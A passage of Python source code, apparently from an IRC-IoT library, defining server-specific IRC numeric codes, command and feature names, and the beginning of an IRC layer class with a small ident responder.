RPL_STATSGLINE = "223"
RPL_STATSTLINE = "224"
if irc_default_draft == "Bahamut":
RPL_STATSCLONE = "225"
RPL_STATSCOUNT = "226"
if irc_default_draft in [ "ircu", "hybrid", "plexus", "snircd" ]:
RPL_STATALINE = "226"
if irc_default_draft == "Unreal":
RPL_STATSELINE = "225"
RPL_STATSNLINE = "226"
RPL_STATSVLINE = "227"
RPL_STATSBANVER = "228"
RPL_SERVICEINFO = "231"
RPL_ENDOFSERVICES = "232"
RPL_SERVICE = "233"
RPL_SERVLIST = "234"
RPL_SERVLISTEND = "235"
if irc_default_draft == "IRCNet":
RPL_STATSIAUTH = "239"
elif irc_default_draft == "RFC2812":
RPL_STATSVLINE = "240"
RPL_STATSLLINE = "241"
RPL_STATSUPTIME = "242"
RPL_STATSOLINE = "243"
if irc_default_draft == "RFC2812":
RPL_STATSSLINE = "244"
else:
RPL_STATSHLINE = "244"
if irc_default_draft in [ "Unreal", "Bahamut", "Charybdis", \
"IRCNet", "plexus", "seven", "ratbox" ]:
RPL_STATSSLINE = "245"
if irc_default_draft == "ircu":
RPL_STATSTLINE = "246"
RPL_STATSGLINE = "247"
if irc_default_draft == "Unreal":
RPL_STATSXLINE = "247"
if irc_default_draft == "ircu":
RPL_STATSULINE = "248"
RPL_STATSDEBUG = "249" # Unknown
RPL_LUSERCONNS = "250" # '1998
RPL_LUSERCLIENT = "251"
RPL_LUSEROP = "252"
RPL_LUSERUNKNOWN = "253"
RPL_LUSERCHANNELS = "254"
RPL_LUSERME = "255"
RPL_ADMINME = "256"
RPL_ADMINLOC1 = "257"
RPL_ADMINLOC2 = "258"
RPL_ADMINEMAIL = "259"
RPL_TRACELOG = "261"
RPL_ENDOFTRACE = "262" # '1997
if irc_default_draft in [ "RFC2812", "IRCNet" ]:
RPL_TRYAGAIN = "263"
else:
RPL_LOAD2HI = "263"
RPL_N_LOCAL = "265" # '1997
RPL_N_GLOBAL = "266" # '1997
if irc_default_draft in ircd_iu_Un_Ba_sn:
RPL_SILELIST = "271"
RPL_ENDOFSILELIST = "272"
if irc_default_draft in ircd_iu_Un_sn:
RPL_STATUSDLINE = "275"
if irc_default_draft == "Bahamut":
RPL_USIGNSSL = "275"
if irc_default_draft in [ "Charybdis", "seven", "hybrid", "plexus" ]:
RPL_WHOISCERTFP = "276"
if irc_default_draft in ircd_iu_sn:
RPL_STATSRLINE = "276"
RPL_GLIST = "280"
RPL_ENDOFGLIST = "281"
if irc_default_draft == "Unreal":
RPL_HELPHDR = "290"
RPL_HELPOP = "291"
RPL_HELPTLR = "292"
RPL_HELPHLP = "293"
RPL_HELPFWD = "294"
RPL_HELPIGN = "295"
if irc_default_draft == "snircd":
RPL_DATASTR = "290"
RPL_ENDOFCHECK = "291"
RPL_NONE = "300" # Unused?
RPL_AWAY = "301"
RPL_USERHOST = "302"
RPL_ISON = "303"
RPL_TEXT = "304"
RPL_UNAWAY = "305"
RPL_NOAWAY = "306"
if irc_default_draft == "ircu":
RPL_USERIP = "307"
if irc_default_draft in [ "Bahamut", "hybrid" ]:
RPL_WHOISADMIN = "308"
if irc_default_draft == "Unreal":
RPL_RULESSTART = "308"
RPL_ENDOFRULES = "309"
if irc_default_draft == "Bahamut":
RPL_WHOISSADMIN = "309"
if irc_default_draft == "Unreal":
RPL_WHOISHELPOP = "310"
elif irc_default_draft == "Bahamut":
RPL_WHOISSVCMSG = "310"
elif irc_default_draft in [ "hybrid", "plexus" ]:
RPL_WHOISMODES = "310"
else:
RPL_WHOISHELP = "310" # Unknown
RPL_WHOISUSER = "311"
RPL_WHOISSERVER = "312"
RPL_WHOISOPERATOR = "313"
RPL_WHOWASUSER = "314"
RPL_ENDOFWHO = "315"
RPL_WHOISCHANOP = "316"
RPL_WHOISIDLE = "317"
RPL_ENDOFWHOIS = "318"
RPL_WHOISCHANNELS = "319"
RPL_WHOISWORLD = "320" # Unknown
RPL_LISTSTART = "321"
RPL_LIST = "322"
RPL_LISTEND = "323"
RPL_CHANNELMODEIS = "324"
if irc_default_draft in ircd_Ch_se:
RPL_CHANNELMLOCK = "325"
RPL_CHANNELURL = "328"
else:
RPL_UNIQOPIS = "325" # Unknown
if irc_default_draft == "Insp":
RPL_CHANNELCREATED = "329"
if irc_default_draft == "Insp":
RPL_NOTOPICSET = "331"
else:
RPL_NOTOPIC = "331"
RPL_CURRENTTOPIC = "332"
RPL_TOPICINFO = "333"
if irc_default_draft in ircd_iu_sn:
RPL_LISTUSAGE = "334"
if irc_default_draft in ircd_Un_Ba:
RPL_COMMANDSYNTAX = "334"
if irc_default_draft == "Unreal":
RPL_LISTSYNTAX = "334"
RPL_WHOISBOT = "335"
if irc_default_draft in [ "Bahamut", "Charybdis", \
"hybrid", "seven" ]:
RPL_WHOISTEXT = "337"
RPL_WHOISACTUALLY = "338"
if irc_default_draft in ircd_iu_Un_sn:
RPL_USERIP = "340"
RPL_INVITING = "341"
RPL_SUMMONING = "342"
RPL_INVITED = "354" # GameSurge only?
if irc_default_draft in [ "Unreal", "ratbox", "seven", \
"Bahamut", "Charybdis", "hybrid", "plexus" ]:
RPL_INVITELIST = "346"
RPL_ENDOFINVITELIST = "347"
RPL_EXCEPTLIST = "348"
RPL_ENDOFEXCEPTLIST = "349"
RPL_VERSION = "351"
RPL_WHOREPLY = "352"
RPL_NAMREPLY = "353"
if irc_default_draft == "Bahamut":
RPL_RWHOREPLY = "354"
elif irc_default_draft in [ "ircu", "seven", \
"Charybdis", "snircd" ]:
RPL_WHOSPCRPL = "354"
if irc_default_draft in ircd_iu_sn:
RPL_DELNAMREPLY = "355"
RPL_KILLDONE = "361"
RPL_CLOSING = "362"
RPL_CLOSEEND = "363"
RPL_LINKS = "364"
RPL_ENDOFLINKS = "365"
RPL_ENDOFNAMES = "366"
RPL_BANLIST = "367"
RPL_ENDOFBANLIST = "368"
RPL_ENDOFWHOWAS = "369"
RPL_INFO = "371"
RPL_MOTD = "372"
RPL_INFOSTART = "373"
RPL_ENDOFINFO = "374"
RPL_MOTDSTART = "375"
RPL_ENDOFMOTD = "376"
RPL_MOTD2 = "377" # Unknown
RPL_AUSTMOTD = "378" # Austnet?
if irc_default_draft == "Unreal":
RPL_WHOISMODES = "379"
RPL_YOUREOPER = "381"
RPL_REHASHING = "382"
if irc_default_draft in [ "Unreal", "IRCNet", "RFC2812" ]:
RPL_YOURESERVICE = "383"
RPL_MYPORTIS = "384"
if irc_default_draft in [ "Unreal", "Bahamut", "IRCNet", \
"Charybdis", "seven", "ratbox" ]:
RPL_NOTOPERANYMORE = "385"
if irc_default_draft == "Unreal":
RPL_QLIST = "386"
RPL_ENDOFQLIST = "387"
RPL_ALIST = "388"
RPL_ENDOFALIST = "389"
RPL_TIME = "391"
RPL_USERSSTART = "392"
RPL_USERS = "393"
RPL_ENDOFUSERS = "394"
RPL_NOUSERS = "395"
if irc_default_draft == "ircu":
RPL_HOSTHIDDEN = "396"
ERR_UNKNOWNERROR = "400" # Unknown
ERR_NOSUCHNICK = "401"
ERR_NOSUCHSERVER = "402"
ERR_NOSUCHCHANNEL = "403"
ERR_CANNOTSENDTOCHAN = "404"
ERR_TOOMANYCHANNELS = "405"
ERR_WASNOSUCHNICK = "406"
ERR_TOOMANYTARGETS = "407"
if irc_default_draft == "Unreal":
ERR_NOSUCHSERVICE = "408"
ERR_NOORIGIN = "409"
if irc_default_draft in ircd_iu_sn:
ERR_UNKNOWNCAPCMD = "410"
else:
ERR_INVALIDCAPCMD = "410"
ERR_NORECIPIENT = "411"
ERR_NOTEXTTOSEND = "412"
ERR_NOTOPLEVEL = "413"
ERR_WILDTOPLEVEL = "414"
if irc_default_draft == "RFC2812":
ERR_BADMASK = "415"
if irc_default_draft in ircd_iu_sn:
ERR_QUERYTOOLONG = "416"
elif irc_default_draft == "IRCNet":
ERR_TOOMANYMATCHES = "416"
if irc_add_v3 in irc_additional_drafts:
ERR_INPUTTOOLONG = "417"
ERR_UNKNOWNCOMMAND = "421"
ERR_NOMOTD = "422"
ERR_NOADMININFO = "423"
ERR_FILEERROR = "424"
if irc_default_draft == "Unreal":
ERR_NOOPERMOTD = "425"
elif irc_default_draft == "Bahamut":
ERR_TOOMANYAWAY = "429"
ERR_NONICKNAMEGIVEN = "431"
ERR_ERRONEUSNICKNAME = "432"
ERR_NICKNAMEINUSE = "433"
if irc_default_draft == "Unreal":
ERR_NORULES = "434"
if irc_default_draft in [ "Unreal", "IRCNet" ]:
ERR_SERVICECONFUSED = "435"
ERR_NICKCOLLISION = "436"
if irc_default_draft in [ "Charybdis", "RFC2812", \
"hybrid", "IRCNet", "ratbox", "seven" ]:
ERR_UNAVAILRESOURCE = "437"
if irc_default_draft == "ircu":
ERR_BANNICKCHANGE = "437"
ERR_NICKCHANGETOOFAST = "438"
if irc_default_draft in [ "Unreal", "Charybdis", \
"hybrid", "ratbox", "seven", "plexus", "snircd" ]:
ERR_NICKTOOFAST = "438"
if irc_default_draft in [ "ircu", "Bahamut", "Unreal", \
"plexus", "snircd" ]:
ERR_TARGETTOOFAST = "439"
if irc_default_draft == "Bahamut":
ERR_SERVICESDOWN = "440"
ERR_USERNOTINCHANNEL = "441"
ERR_NOTONCHANNEL = "442"
ERR_USERONCHANNEL = "443"
ERR_NOLOGIN = "444"
ERR_SUMMONDISABLED = "445"
ERR_USERSDISABLED = "446"
if irc_default_draft in [ "Unreal", "Insp" ]:
ERR_NONICKCHANGE = "447"
ERR_NOTREGISTERED = "451"
if irc_default_draft == "Unreal":
ERR_HOSTILENAME = "455"
ERR_NOHIDING = "459"
ERR_NOTFORHALFOPS = "460"
ERR_NEEDMOREPARAMS = "461"
ERR_ALREADYREGISTERED = "462"
ERR_NOPERMFORHOST = "463"
ERR_PASSWDMISMATCH = "464"
ERR_YOUREBANNEDCREEP = "465"
ERR_YOUWILLBEBANNED = "466"
ERR_KEYSET = "467"
if irc_default_draft in ircd_iu_sn:
ERR_INVALIDUSERNAME = "468"
if irc_default_draft == "Unreal":
ERR_LINKSET = "469"
if irc_default_draft in ircd_Un_Ch_se:
ERR_LINKCHANNEL = "470"
ERR_CHANNELISFULL = "471"
ERR_UNKNOWNMODE = "472"
ERR_INVITEONLYCHAN = "473"
ERR_BANNEDFROMCHAN = "474"
ERR_BADCHANNELKEY = "475"
ERR_BADCHANNELMASK = "476"
if irc_default_draft in ircd_iu_Un_Ba:
ERR_NEEDREGGEDNICK = "477"
if irc_default_draft == "RFC2812":
ERR_NOCHANMODES = "477"
ERR_BANLISTFULL = "478"
if irc_default_draft == "pircd":
ERR_SECUREONLYCHANNEL = "479"
if irc_default_draft == "Unreal":
ERR_LINKFAIL = "479"
ERR_CANNOTKNOCK = "480"
ERR_NOPRIVILEGES = "481"
ERR_CHANOPRIVSNEEDED = "482"
ERR_CANTKILLSERVER = "483"
if irc_default_draft == "ircu":
ERR_ISCHANSERVICE = "484"
elif irc_default_draft in [ "RFC2812", "hybrid", "IRCNet" ]:
ERR_RESTRICTED = "484"
if irc_default_draft == "Unreal":
ERR_ATTACKDENY = "484"
ERR_KILLDENY = "485"
else:
ERR_UNIQOPPRIVSNEEDED = "485" # Unknown
if irc_default_draft == "unreal":
ERR_HTMDISABLED = "486"
if irc_default_draft == "IRCNet":
ERR_CHANTOORECENT = "487"
ERR_TSLESSCHAN = "488"
elif irc_default_draft == "Bahamut":
ERR_NOSSL = "488"
if irc_default_draft == "Unreal":
ERR_SECUREONLYCHAN = "489"
ERR_NOSWEAR = "490"
ERR_NOOPERHOST = "491"
ERR_NOSERVICEHOST = "492"
ERR_UMODEUNKNOWNFLAG = "501"
ERR_USERSDONTMATCH = "502"
if irc_default_draft in ircd_iu_Un_Ba_sn:
ERR_SILELISTFULL = "511"
if irc_default_draft in ircd_iu_sn:
ERR_NOSUCHGLINE = "512"
else:
ERR_TOOMANYWATCH = "512" # Unknown
if irc_default_draft in ircd_iu_sn:
ERR_BADPING = "513"
else:
ERR_NOSUCHGLINE = "513"
if irc_default_draft == "Unreal":
ERR_NEEDPONG = "513"
ERR_NOINVITE = "518"
ERR_ADMONLY = "519"
ERR_OPERONLY = "520"
ERR_LISTSYNTAX = "521"
ERR_WHOSYNTAX = "522"
ERR_WHOLIMEXCEED = "523"
ERR_OPERSPVERIFY = "524"
if irc_default_draft in ircd_Un_Ba:
RPL_LOGON = "600"
RPL_LOGOFF = "601"
if irc_default_draft == "Unreal":
RPL_WATCHOFF = "602"
RPL_WATCHSTAT = "603"
elif irc_default_draft == "Bahamut":
RPL_NOWON = "604"
RPL_NOWOFF = "605"
if irc_default_draft == "Unreal":
RPL_WATCHLIST = "606"
RPL_ENDOFWATCHLIST = "607"
RPL_MAPMORE = "610"
if irc_default_draft in ircd_Un_Ba:
RPL_DCCSTATUS = "617"
if irc_default_draft == "Unreal":
RPL_DUMPING = "640"
RPL_DUMPRPL = "641"
RPL_EODUMP = "642"
RPL_SPAMCMDFWD = "659"
if irc_default_draft == "Kine":
RPL_TRACEROUTE_HOP = "660"
RPL_TRACEROUTE_START = "661"
RPL_MODECHANGEWARN = "662"
RPL_CHANREDIR = "663"
RPL_SERVMODEIS = "664"
RPL_OTHERUMODEIS = "665"
if irc_add_v3 in irc_additional_drafts:
RPL_STARTTLS = "670"
if irc_default_draft == "Kine":
RPL_WHOISSTAFF = "689"
RPL_WHOISLANGUAGE = "690"
if irc_default_draft == "ratbox":
RPL_MODLIST = "702"
RPL_ENDOFMODLIST = "703"
RPL_HELPSTART = "704"
RPL_HELPTXT = "705"
RPL_ENDOFHELP = "706"
RPL_ETRACEFULL = "708"
RPL_ETRACE = "709"
RPL_KNOCK = "710"
RPL_KNOCKDLVR = "711"
ERR_TOOMANYKNOCK = "712"
ERR_CHANOPEN = "713"
ERR_KNOCKONCHAN = "714"
ERR_KNOCKDISABLED = "715"
RPL_TARGUMODEG = "716"
RPL_TARGNOTIFY = "717"
RPL_UMODEGMSG = "718"
RPL_OMOTDSTART = "720"
RPL_OMOTD = "721"
RPL_ENDOFOMOTD = "722"
ERR_NOPRIVS = "723"
RPL_TESTMARK = "724"
RPL_TESTLINE = "725"
RPL_NOTESTLINE = "726"
if irc_default_draft in ircd_Ch_se_ra_pl:
RPL_TESTMASK = "724"
RPL_TESTLINE = "725"
RPL_NOTESTLINE = "726"
if irc_default_draft == "plexus":
RPL_ISCAPTURED = "727"
if irc_default_draft in ircd_Ch_se_ra:
RPL_TESTMASKGECOS = "727"
if irc_default_draft == "plexus":
RPL_ISUNCAPTURED = "728"
if irc_default_draft in ircd_Ch_se:
RPL_QUIETLIST = "728"
RPL_ENDOFQUIETLIST = "729"
if irc_default_draft in ircd_Ch_se_ra:
RPL_MONONLINE = "730"
RPL_MONOFFLINE = "731"
RPL_MONLIST = "732"
RPL_ENDOFMONLIST = "733"
ERR_MONLISTFULL = "734"
RPL_RSACHALLENGE2 = "740"
RPL_ENDOFRSACHALLNGE2 = "741"
if irc_default_draft in ircd_Un_Ch_se:
ERR_MLOCKRESTRICTED = "742"
if irc_default_draft in ircd_Ch_se:
ERR_INVALIDBAN = "743"
ERR_TOPICLOCK = "744"
RPL_SCANMATCHED = "750"
RPL_SCANUMODES = "751"
if irc_default_draft == "IRCNet":
RPL_ETRACEEND = "759"
if irc_add_plus in irc_additional_drafts:
RPL_SERVICES_SUPPORTS_IRCPLUS = "800"
RPL_SERVICES_NEEDPASS = "801"
RPL_SERVICES_PASSOK = "802"
RPL_SERVICES_BADPASS = "803"
RPL_SERVICES_COMMAND_SUCCESS = "804"
RPL_SERVICES_COMMAND_ERROR = "805"
RPL_SERVICES_INFO = "806"
RPL_SERVICES_INFO_END = "807"
RPL_SERVICES_ERROR_NEEDREGISTRATION = "808"
RPL_SERVICES_NICKSTATUS = "809"
RPL_SERVICES_MEMO_READ = "810"
RPL_SERVICES_HELP_START = "811"
RPL_SERVICES_HELP = "812"
RPL_SERVICES_HELP_END = "813"
RPL_SERVICES_LIST_START = "814"
RPL_SERVICES_LIST = "815"
RPL_SERVICES_LIST_END = "816"
RPL_SERVICES_GLIST_START = "817"
RPL_SERVICES_GLIST = "818"
RPL_SERVICES_GLIST_END = "819"
RPL_SERVICES_MEMO_START = "820"
RPL_SERVICES_MEMO = "821"
RPL_SERVICES_MEMO_END = "822"
RPL_SERVICES_CHANSERV_CHANKEY = "823"
if irc_default_draft == "PyIRCIoT":
RPL_JSON = "851"
if irc_default_draft in ircd_Un_Ch_se:
RPL_LOGGEDIN = "900"
RPL_LOGGEDOUT = "901"
ERR_NICKLOCKED = "902"
RPL_SASLSUCCESS = "903"
if irc_add_v3 in irc_additional_drafts:
ERR_SASLFAIL = "904"
ERR_SASLTOOLONG = "905"
ERR_SASLABORTED = "906"
ERR_SASLALREADY = "907"
if irc_default_draft in ircd_Ch_se:
RPL_SASLMECHS = "908"
if irc_default_draft == "Insp":
RPL_AUTOOPLIST = "910"
RPL_ENDOFAUTOOPLIST = "911"
ERR_WORDFILTERED = "936"
RPL_SPAMFILTERLIST = "940"
ERR_ENDOFSPAMFILTERLIST = "941"
RPL_EXEMPTCHANOPSLIST = "953"
ERR_ENDOFEXEMPTCHANOPSLIST = "954"
if irc_default_draft in [ "Unreal", "plexus" ]:
ERR_CANNOTDOCOMMAND = "972"
elif irc_default_draft == "Insp":
ERR_CANTUNLOADMODULE = "972"
RPL_UNLOADEDMODULE = "973"
ERR_CANTLOADMODULE = "974"
RPL_LOADEDMODULE = "975"
elif irc_default_draft == "Bahamut":
ERR_NUMERICERROR = "999"
#
# v this set will be regrouped ...
#
cmd_ADMIN = "ADMIN"
cmd_AWAY = "AWAY"
cmd_CACTION = "CACTION"
cmd_CCLIENTINF = "CCLIENTINFO"
cmd_CDCC = "CDCC"
cmd_CERRMSG = "CERRMSG"
cmd_CFINGER = "CFINGER"
cmd_CHAT = "CHAT"
cmd_CPING = "CPING"
cmd_CRCLIENTIN = "CRCLIENTINFO"
cmd_CRFINGER = "CRFINGER"
cmd_CRPING = "CRPING"
cmd_CRTIME = "CRTIME"
cmd_CRUSERINFO = "CRUSERINFO"
cmd_CSOURCE = "CSOURCE"
cmd_CTCP = "CTCP"
cmd_CTCPREPLY = "CTCPREPLY"
cmd_CTIME = "CTIME"
cmd_CUSERINFO = "CUSERINFO"
cmd_CVERSION = "CVERSION"
cmd_DCC_CLOSE = "DCC_CLOSE"
cmd_DCC_CON = "DCC_CONNECT"
cmd_DCC_DISCON = "DCC_DISCONNECT"
cmd_DCC_MSG = "DCCMSG"
cmd_DCC_OPEN = "DCC_OPEN"
cmd_DCC_UPDATE = "DCC_UPDATE"
cmd_DISCONNECT = "DISCONNECT"
cmd_ERROR = "ERROR"
cmd_INFO = "INFO"
cmd_INVITE = "INVITE"
cmd_ISON = "ISON"
cmd_JOIN = "JOIN"
cmd_KICK = "KICK"
cmd_KILL = "KILL"
cmd_LEAVING = "LEAVING"
cmd_LINKS = "LINKS"
cmd_LIST = "LIST"
cmd_MODE = "MODE"
cmd_MOTD = "MOTD"
cmd_MSG = "MSG"
cmd_NAMES = "NAMES"
cmd_NICK = "NICK"
cmd_NOTICE = "NOTICE"
cmd_NJOIN = "NJOIN"
cmd_OPER = "OPER"
cmd_PART = "PART"
cmd_PASS = "PASS"
cmd_PING = "PING"
cmd_PONG = "PONG"
cmd_PRIVMSG = "PRIVMSG"
cmd_PRIVNOTICE = "PRIVNOTICE"
cmd_PUBLIC = "PUBLIC"
cmd_PUBMSG = "PUBMSG"
cmd_PUBNOTICE = "PUBNOTICE"
cmd_REHASH = "REHASH"
cmd_RESTART = "RESTART"
cmd_QUIT = "QUIT"
cmd_SERVER = "SERVER"
cmd_SQUIT = "SQUIT"
cmd_STATS = "STATS"
cmd_SUMMON = "SUMMON"
cmd_TIME = "TIME"
cmd_TOPIC = "TOPIC"
cmd_TRACE = "TRACE"
cmd_UMODE = "UMODE"
cmd_USER = "USER"
cmd_USERS = "USERS"
cmd_USERHOST = "USERHOST"
cmd_VERSION = "VERSION"
cmd_WALLOPS = "WALLOPS"
cmd_WHOIS = "WHOIS"
cmd_WHOWAS = "WHOWAS"
cmd_WHO = "WHO"
if irc_default_draft == "ircu":
cmd_ACCOUNT = "ACCOUNT"
cmd_CLARMODE = "CLEARMODE"
cmd_CLOSE = "CLOSE"
cmd_CNOTICE = "CNOTICE"
cmd_CONNECT = "CONNECT"
cmd_CPRIVMSG = "CPRIVMSG"
cmd_CREATE = "CREATE"
cmd_DESTRUCT = "DESCTRUCT"
cmd_DESYNCH = "DESYNCH"
cmd_DIE = "DIE"
cmd_GLINE = "GLINE"
cmd_HASH = "HASH"
cmd_HELP = "HELP"
cmd_JUPE = "JUPE"
cmd_LUSERS = "LUSERS"
cmd_MAP = "MAP"
cmd_OPMODE = "OPMODE"
cmd_PRIVS = "PRIVS"
cmd_PROTO = "PROTO"
cmd_RESET = "RESET"
cmd_RPING = "RPING"
cmd_RPONG = "RPONG"
cmd_SET = "SET"
cmd_SETTIME = "SETTIME"
cmd_SILENCE = "SILENCE"
cmd_UPING = "UPING"
cmd_USERIP = "USERIP"
cmd_WALLCHOPS = "WALLCHOPS"
cmd_WALLUSERS = "WALLUSERS"
cmd_WALLVOICE = "WALLVOICE"
if irc_add_v3 in irc_additional_drafts:
cmd_ACC = "ACC"
cmd_AUTHENTICATE = "AUTHENTICATE"
cmd_BATCH = "BATCH"
cmd_CAP = "CAP"
cmd_FAIL = "FAIL"
#cmd_MAXLINE = "MAXLINE" (line-length-3.3)
cmd_SETNAME = "SETNAME"
cmd_STARTTLS = "STARTTLS"
cmd_TAGMSG = "TAGMSG"
cmd_WARN = "WARN"
cmd_WEBIRC = "WEBIRC"
cmd_MULTILINE_MAX_BYTES = "MULTILINE_MAX_BYTES"
cmd_MULTILINE_MAX_LINES = "MULTILINE_MAX_LINES"
cmd_MULTILINE_INVALID = "MULTILINE_INVALID"
cmd_MULTILINE_INVALID_TARGET = "MULTILINE_INVALID_TARGET"
#
if irc_default_draft == "ircu":
feature_AWAYLEN = "AWAYLEN"
feature_CASEMAPPING = "CAEMAPPING"
if irc_default_draft == "ircu":
feature_CHANNELLEN = "CHANNELLEN"
feature_CHANMODES = "CHANMODES"
feature_CHANTYPES = "CHANTYPES"
if irc_default_draft == "ircu":
feature_CNOTICE = "CNOTICE"
feature_CPRIVMSG = "CPRIVMSG"
feature_MAXCHANLEN = "MAXCHANNELLEN"
feature_KICKLEN = "KICKLEN"
feature_MODES = "MODES"
feature_MAXCHANS = "MAXCHANNELS"
feature_MAXBNANS = "MAXBANS"
feature_MAXNICKLEN = "MAXNICKLEN"
feature_NETWORK = "NETWORK"
feature_NICKLEN = "NICKLEN"
feature_PREFIX = "PREFIX"
if irc_default_draft == "ircu":
feature_SILENCE = "SILENCE"
feature_STATUSMSG = "STATUSMSG"
feature_TOPICLEN = "TOPICLEN"
feature_USERIP = "USERIP"
feature_WALLCHOPS = "WALLCHOPS"
feature_WALLVOICES = "WALLVOICES"
feature_WHOX = "WHOX"
#
featt_EMPTY = 0
featt_FLAGS = 1
featt_STRING = 2
featt_NUMBER = 3
#
ident_default_ip = '0.0.0.0'
ident_default_port = 113
#
err_NOT_IRCIOT_NET = 2019
#
err_DESCRIPTIONS = irciot_shared_.CONST.err_DESCRIPTIONS
err_DESCRIPTIONS.update({
err_NOT_IRCIOT_NET : "Warning! Not an IRC-IoT network: '{}'"
})
#
def __setattr__(self, *_):
pass
def __init__(self, in_mode = None):
#
self.CONST = self.CONST()
#
super(PyLayerIRC, self).__init__()
#
self.irc_encoding = self.CONST.irc_default_encoding
self.irc_MTU = self.CONST.irc_default_MTU
#
self.__irc_nick_matcher \
= re.compile(self.CONST.irc_nick_regexp, re.IGNORECASE)
self.__irc_channel_matcher \
= re.compile(self.CONST.irc_channel_regexp, re.IGNORECASE)
#
self.__irc_nick = self.CONST.irc_default_nick
self.irc_user = self.irc_tolower_(self.CONST.irc_default_nick)
self.irc_info = self.CONST.irc_default_info
self.irc_quit = self.CONST.irc_default_quit
self.irc_nick_old = self.__irc_nick
self.irc_nick_base = self.__irc_nick
self.irc_nick_try = ""
#
self.irc_nick_length = self.CONST.irc_max_nick_length
self.irc_topic_length = self.CONST.irc_max_topic_length
#
self.irc_ssl = self.CONST.irc_default_ssl
self.irc_server = self.CONST.irc_default_server
self.irc_port = self.CONST.irc_default_port
if self.irc_ssl:
self.irc_port = self.CONST.irc_default_ssl_port
self.__irc_password = self.CONST.irc_default_password
self.irc_ident = self.CONST.irc_default_ident
#
# This variable is not used to connect, if you don't have a server name
# and you want to use the IP, put its text value into self.irc_server
self.irc_server_ip = None
self.__irc_local_port = 0
self.irc_network_name = None
#
self.irc_proxy = None
if self.CONST.irc_default_proxy != None:
self.irc_proxy_server = self.CONST.irc_default_proxy_server
self.irc_proxy_port = self.CONST.irc_default_proxy_port
self.__irc_proxy_password = self.CONST.irc_default_proxy_password
#
self.irc_status = 0
self.__irc_recon = 1
self.irc_last = None
#
self.irc_servers = [ ( \
self.irc_server, self.irc_port, \
self.__irc_password, self.irc_ssl, 0, None ) ]
#
self.irc_proxies = []
if self.irc_proxy != None:
self.irc_proxies = [ ( \
self.irc_proxy_server, self.irc_proxy_port, \
self.__irc_proxy_password, 0, None ) ]
#
self.irc_channel = self.CONST.irc_default_channel
self.irc_chankey = self.CONST.irc_default_chankey
self.__join_retry = 0
self.__join_retry_max = self.CONST.irc_default_join_retry
#
self.__nick_pause = 0
#
# ( irc channel, irc channel key, join retry count )
self.irc_channels = [ ( \
self.irc_channel, self.irc_chankey, 0 ) ]
#
self.irc_users = self.CONST.irc_default_users
self.irc_anons = []
self.irc_nicks = []
#
self.irc_talk_with_strangers = \
self.CONST.irc_default_talk_with_strangers
self.irc_last_temporal_vuid = \
self.CONST.api_first_temporal_vuid
#
self.__irc_queue = [0, 0]
self.__irc_queue[self.CONST.irc_queue_input ] = Queue(maxsize=0)
self.__irc_queue[self.CONST.irc_queue_output ] = Queue(maxsize=0)
#
self.__irc_queue_lock = [0, 0]
self.__irc_queue_lock[self.CONST.irc_queue_input ] = False
self.__irc_queue_lock[self.CONST.irc_queue_output ] = False
#
self.irc_commands = []
self.irc_codes = []
self.irc_features = []
#
if in_mode in self.CONST.irc_layer_modes:
self.__irc_layer_mode = in_mode
else:
self.__irc_layer_mode = self.CONST.irc_default_mode
#
self.__irc_task = None
self.irc_run = False
self.irc_debug = self.CONST.irc_default_debug
#
self.__ident_task = None
self.ident_run = False
self.ident_ip = self.CONST.ident_default_ip
self.ident_port = self.CONST.ident_default_port
#
self.irc_mid_pipeline_size \
= self.CONST.irc_default_mid_pipeline_size
#
self.irc_silence_max = self.CONST.irc_default_silence
self.__irc_silence = 0
#
self.time_now = datetime.datetime.now()
self.__time_ping = self.time_now
self.__delta_time = 0
self.__delta_ping = 0
#
# Supporting eXtended WHO command:
self.__whox = False
# Supporting of WALLCHOPS command:
self.__wallchops = False
#
self.__os_name = self.get_os_name_()
#
self.update_irc_host_()
#
self.lang = self.CONST.hl_default
#
self.errors = self.CONST.err_DESCRIPTIONS
#
self.irciot_set_locale_(self.lang)
#
# End of __init__()
def update_irc_host_(self):
try:
my_ip = self.get_src_ip_by_dst_ip_(self.irc_server_ip)
my_host = self.dns_reverse_resolver_(my_ip)
if socket.gethostbyname(my_host) != my_ip:
my_host = None
except:
my_host = None
if my_host == None:
try:
my_host = socket.gethostname()
except:
my_host = "localhost";
self.irc_host = my_host
def ident_server_(self):
def ident_ok_():
if not self.irc_run:
self.ident_run = False
if not self.ident_run:
return False
return True
if not self.is_ip_address_(self.ident_ip):
return
if not self.is_ip_port_(self.ident_port):
return
while (self.ident_run):
try:
if self.is_ipv4_address_(self.ident_ip):
my_af_inet = socket.AF_INET
else:
my_af_inet = socket.AF_INET6
my_socket = socket.socket(my_af_inet, socket.SOCK_STREAM)
my_socket.settimeout(self.CONST.irc_ident_wait)
my_socket.bind((self.ident_ip, self.ident_port))
my_socket.listen(1)
except:
my_socket.close()
sleep(self.CONST.irc_default_wait)
if not ident_ok_():
break
continue
while (ident_ok_()):
try:
try:
my_conn, my_addr = my_socket.accept()
except:
break
if not ident_ok_():
break
if not my_addr[0] in [ self.irc_server_ip, '127.0.0.1', '::1' ]:
my_conn.close()
break
while (ident_ok_()):
my_ready = select.select([my_socket], [], [], 0)
if my_ready[0] == [] and ident_ok_():
my_data = my_conn.recv(self.CONST.irc_buffer_size \
).decode(self.irc_encoding)
if my_data:
for my_char in [ '\n', '\r', ' ' ]:
my_data = my_data.replace(my_char, '')
my_split = my_data.split(',')
my_ok = True
my_port = "{}".format(self.irc_port)
if my_split[0] == "" or my_split[1] != my_port:
break
if self.is_ip_port_(self.__irc_local_port):
my_port = "{}".format(self.__irc_local_port)
if my_split[0] != my_port:
my_ok = False
my_out = "{} , {} : ".format(my_split[0], my_split[1])
if my_ok:
my_out += "USERID : UNIX : {}\n".format(self.irc_user)
else:
my_out += "ERROR : NO-USER\n"
my_conn.send(bytes(my_out, self.irc_encoding))
self.ident_run = False
break
else:
break
else:
sleep(self.CONST.irc_micro_wait)
my_conn.close()
sleep(self.CONST.irc_micro_wait)
except:
my_conn.close()
sleep(self.CONST.irc_micro_wait)
try:
my_socket.close()
except:
pass
sleep(self.CONST.irc_micro_wait)
#
# End of ident_server_()
def start_IRC_(self):
if self.__irc_layer_mode in [
self.CONST.irc_mode_CLIENT,
self.CONST.irc_mode_SERVICE ]:
my_target = self.irc_process_client_
elif self.__irc_layer_mode == self.COSNT.irc_mode_SERVER:
my_target = self.irc_process_server_
else:
return False
self.irc_run = True
self.__irc_task = threading.Thread(target = my_target)
self.__irc_task.start()
return True
#
# End of start_IRC_()
def stop_IRC_(self):
self.irc_run = False
self.ident_run = False
self.irc_debug = False
self.__irc_password \
